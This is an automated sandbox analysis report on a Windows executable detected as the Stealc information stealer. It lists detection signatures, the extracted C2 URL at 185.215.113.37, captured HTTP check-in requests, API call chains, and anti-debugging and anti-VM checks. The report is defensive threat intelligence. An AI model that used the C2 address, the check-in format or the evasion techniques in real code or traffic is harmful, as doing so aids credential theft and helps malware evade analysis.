
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1541350
MD5: 20a21ec73989a782b2b0243f0ed123ba
SHA1: e81022b1710d56722b6f61b61c7d4a798d9dcbba
SHA256: 8313f9dad601a181e4ec94751f43c08ae280504db80c68fbb6ff86e26902d38b
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 20A21EC73989A782B2B0243F0ED123BA)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1747910507.000000000160E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.1705441818.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 7348 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 7348 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.dc0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-24T18:08:02.054638+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP


AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: http://185.215.113.37/ws | URL Reputation: Label: malware
Source: 0.2.file.exe.dc0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_00DCC820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DC9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_00DC9AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DC7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_00DC7240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DC9B60 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_00DC9B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DD8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_00DD8EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DD38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_00DD38B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DD4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00DD4910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_00DCDA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_00DCE430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DD4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00DD4570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_00DCED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DC16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00DC16D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00DCF6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DD3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00DD3EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_00DCBE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00DCDE10

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
  Host: 185.215.113.37
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJ
  Host: 185.215.113.37
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 44 32 33 35 38 38 36 46 38 37 32 35 35 36 31 33 34 35 35 39 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 2d 2d 0d 0a
  Data Ascii:
    ------DBGHJEBKJEGHJKECAAKJ
    Content-Disposition: form-data; name="hwid"

    E0D235886F872556134559
    ------DBGHJEBKJEGHJKECAAKJ
    Content-Disposition: form-data; name="build"

    doma
    ------DBGHJEBKJEGHJKECAAKJ--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DC4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_00DC4880
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJ
  Host: 185.215.113.37
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 44 32 33 35 38 38 36 46 38 37 32 35 35 36 31 33 34 35 35 39 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 2d 2d 0d 0a
  Data Ascii:
    ------DBGHJEBKJEGHJKECAAKJ
    Content-Disposition: form-data; name="hwid"

    E0D235886F872556134559
    ------DBGHJEBKJEGHJKECAAKJ
    Content-Disposition: form-data; name="build"

    doma
    ------DBGHJEBKJEGHJKECAAKJ--
Source: file.exe, 00000000.00000002.1747910507.000000000160E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1747910507.0000000001667000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1747910507.0000000001667000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/(
Source: file.exe, 00000000.00000002.1747910507.0000000001659000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747910507.0000000001667000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747910507.0000000001699000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1747910507.0000000001659000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php/
Source: file.exe, 00000000.00000002.1747910507.0000000001667000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php2
Source: file.exe, 00000000.00000002.1747910507.0000000001659000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpS
Source: file.exe, 00000000.00000002.1747910507.0000000001659000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php_
Source: file.exe, 00000000.00000002.1747910507.0000000001667000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/t
Source: file.exe, 00000000.00000002.1747910507.0000000001667000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.1747910507.000000000160E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37e

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01140101 | 0_2_01140101
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01054144 | 0_2_01054144
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01182000 | 0_2_01182000
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0104F8BA | 0_2_0104F8BA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01185395 | 0_2_01185395
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118320D | 0_2_0118320D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01192206 | 0_2_01192206
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0105DAB2 | 0_2_0105DAB2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01060ACD | 0_2_01060ACD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0117355A | 0_2_0117355A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010C9C12 | 0_2_010C9C12
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011864B1 | 0_2_011864B1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118B4A7 | 0_2_0118B4A7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111FF6D | 0_2_0111FF6D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01187F85 | 0_2_01187F85
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0127278A | 0_2_0127278A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118F7FF | 0_2_0118F7FF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0120F7D4 | 0_2_0120F7D4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118CFE6 | 0_2_0118CFE6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01190628 | 0_2_01190628
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00DC45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: letztgfz ZLIB complexity 0.9949451708038733
Source: file.exe, 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1705441818.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DD8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle | 0_2_00DD8680
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DD3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_00DD3720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\S9Z3CKQS.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1821696 > 1048576
Source: file.exe | Static PE information: Raw size of letztgfz is bigger than: 0x100000 < 0x196a00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.dc0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;letztgfz:EW;rrfcshya:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;letztgfz:EW;rrfcshya:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DD9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00DD9860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c56a1 should be: 0x1cad2c
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: letztgfz
Source: file.exe | Static PE information: section name: rrfcshya
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0105690D push 4FB3E6E9h; mov dword ptr [esp], ebp | 0_2_01056927
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0105690D push 42A9593Ah; mov dword ptr [esp], edx | 0_2_01056969
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0105690D push ebx; mov dword ptr [esp], edx | 0_2_01056A18
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01140101 push edx; mov dword ptr [esp], 15D8BE3Eh | 0_2_01140149
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01140101 push ebx; mov dword ptr [esp], esi | 0_2_01140213
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01140101 push edx; mov dword ptr [esp], ecx | 0_2_0114030C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01213136 push esi; mov dword ptr [esp], eax | 0_2_01213161
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01054144 push ecx; mov dword ptr [esp], ebp | 0_2_0105419F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01054144 push 5B1AD910h; mov dword ptr [esp], edx | 0_2_010541B6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01054144 push ebp; mov dword ptr [esp], ebx | 0_2_01054231
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01054144 push 0DBF08EAh; mov dword ptr [esp], edx | 0_2_0105423E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01054144 push 4D6E191Dh; mov dword ptr [esp], edx | 0_2_0105428C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01054144 push 5B913A21h; mov dword ptr [esp], edx | 0_2_010542E6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01054144 push 06E81A1Ah; mov dword ptr [esp], eax | 0_2_01054316
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011FA15A push ecx; mov dword ptr [esp], 098B45D4h | 0_2_011FA189
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011FA15A push edx; mov dword ptr [esp], 79FE1F41h | 0_2_011FA1AC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011FA15A push 466C91E1h; mov dword ptr [esp], eax | 0_2_011FA266
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012291B5 push eax; mov dword ptr [esp], 7FFA7D67h | 0_2_012291D6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012359B4 push eax; mov dword ptr [esp], 2E8F26B1h | 0_2_012358C7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012231BF push 124B890Fh; mov dword ptr [esp], eax | 0_2_012231E6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012231BF push 2A8ABD71h; mov dword ptr [esp], ebx | 0_2_012231EE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012231BF push 79457612h; mov dword ptr [esp], esp | 0_2_0122320B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012239C6 push eax; mov dword ptr [esp], edx | 0_2_012239E5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DDB035 push ecx; ret | 0_2_00DDB048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011F69F4 push eax; mov dword ptr [esp], esp | 0_2_011F6A59
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01182000 push edi; mov dword ptr [esp], ecx | 0_2_0118201D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01182000 push 077BE303h; mov dword ptr [esp], edi | 0_2_011820B8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01182000 push 744C46D0h; mov dword ptr [esp], ecx | 0_2_01182136
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01182000 push edx; mov dword ptr [esp], ebx | 0_2_0118215A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01182000 push edi; mov dword ptr [esp], ecx | 0_2_01182173
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01182000 push ebp; mov dword ptr [esp], edi | 0_2_0118225C
Source: file.exe | Static PE information: section name: letztgfz entropy: 7.95471366265782

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DD9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00DD9860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13601
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1021B4F second address: 1021B63 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 ja 00007F7ADD664230h 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1197CD0 second address: 1197CD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1182B40 second address: 1182B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1196C8F second address: 1196C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1196C93 second address: 1196CC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F7ADD664238h 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F7ADD664233h 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F7ADD66422Bh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1196CC9 second address: 1196CCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1196CCF second address: 1196CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1196E67 second address: 1196E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1196E6B second address: 1196E8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADD66422Fh 0x00000007 jmp 00007F7ADD66422Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1196E8D second address: 1196E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1196E93 second address: 1196EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jp 00007F7ADD664228h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
